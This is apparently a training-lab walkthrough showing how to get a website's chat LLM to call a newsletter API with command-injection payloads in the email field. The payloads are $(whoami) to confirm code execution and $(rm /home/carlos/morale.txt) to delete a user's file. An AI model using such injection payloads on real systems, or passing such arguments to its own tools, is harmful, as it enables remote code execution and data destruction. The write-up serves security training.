Date : 01 Apr 2025
-
From the lab homepage, click Live chat.
-
Ask the LLM what APIs it has access to. The LLM responds that it can access APIs controlling the following functions:
- Password Reset
- Newsletter Subscription
- Product Information
-
Consider the following points:
- You will probably need remote code execution to delete Carlos'
morale.txtfile. APIs that send emails sometimes use operating system commands that offer a pathway to RCE. - You don't have an account so testing the password reset will be tricky. The Newsletter Subscription API is a better initial testing target.
- You will probably need remote code execution to delete Carlos'
-
Ask the LLM what arguments the Newsletter Subscription API takes.
-
Ask the LLM to call the Newsletter Subscription API with the argument
attacker@YOUR-EXPLOIT-SERVER-ID.exploit-server.net.
-
Click Email client and observe that a subscription confirmation has been sent to the email address as requested. This proves that you can use the LLM to interact with the Newsletter Subscription API directly.
-
Ask the LLM to call the Newsletter Subscription API with the argument
$(whoami)@YOUR-EXPLOIT-SERVER-ID.exploit-server.net.
-
Click Email client and observe that the resulting email was sent to
carlos@YOUR-EXPLOIT-SERVER-ID.exploit-server.net. This suggests that thewhoamicommand was executed successfully, indicating that remote code execution is possible.
-
Ask the LLM to call the Newsletter Subscription API with the argument
$(rm /home/carlos/morale.txt)@YOUR-EXPLOIT-SERVER-ID.exploit-server.net. The resulting API call causes the system to delete Carlos'morale.txtfile, solving the lab.
